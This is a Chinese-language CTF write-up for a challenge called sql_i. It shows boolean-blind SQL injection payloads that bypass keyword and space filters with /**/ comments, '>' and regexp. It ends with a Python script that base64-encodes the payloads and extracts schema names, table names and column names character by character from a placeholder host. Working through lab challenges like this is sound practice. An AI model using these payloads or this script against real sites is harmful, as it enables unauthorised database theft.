1、題目名sql_i,環境打開是一張圖,可以看到id的參數base64加密了。
源碼裏還說sqlmap是沒有靈魂的。
2、and 、空格,base64加密後提交發現被過濾
3、or沒被過濾,空格用/**/替換,base64加密提交,看到表中所有內容,存在注入
1/**/or/**/2/**/</**/3
4、=被過濾那就用>,猜數據庫長度,判斷長度7
1/**/or/**/length(database())/**/>/**/6 五張圖 1/**/or/**/length(database())/**/>/**/7 一張圖
5、用ascii繼續猜,發現ascii也被過濾,那就用regexp,得到數據庫名:dropsec
1/**/or/**/substr(database(),1,1)/**/regexp/**/"a"
6、猜表,就得到一個表pics,然後繼續猜字段和內容,就是5張圖,flag難道是在別的庫?
1/**/or/**/substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/regexp/**/"dropsec"/**/limit/**/1,1),1,1)/**/regexp/**/"a"
7、那就把庫都列出來,除mysql自帶的一共得到2個庫,test和dropsec。test裏是空的,這題是不是出錯了?附fuzz代碼
import base64 import requests def sql_inject(id_string): base_url = "http://xxxxx:9174/index.php?id=" id_string_base64 = base64.b64encode(id_string.encode("utf-8")) inject_url = base_url + id_string_base64.decode("utf-8") response = requests.get(inject_url) return response.text for num in range(1,50): for i in "abcdefghijklmnopqrstuvwxyz_1234567890": response = sql_inject('1/**/or/**/substr((select/**/schema_name/**/from/**/information_schema.schemata),1,1/**/regexp/**/"{}"'.format(i)) # response = sql_inject('1/**/or/**/substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/regexp/**/"dropsec"/**/limit/**/-1,1),%d,1)/**/regexp/**/"%s"' % (num,i)) # response = sql_inject('1/**/or/**/substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/"applicable_roles"/**/limit/**/1,1),{},1)/**/regexp/**/"{}"'.format(num,i)) # response = sql_inject('1/**/or/**/substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/"pics"/**/limit/**/2,1),%d,1)/**/regexp/**/"%s"' % (num,i)) # response = sql_inject('1/**/or/**/substr((select/**/id/**/from/**/dropsec.pics/**/limit/**/1,1),%d,1)/**/regexp/**/"%s"' % (num,i)) # print(len(response),i) if len(response) == 756: print(i,end="") break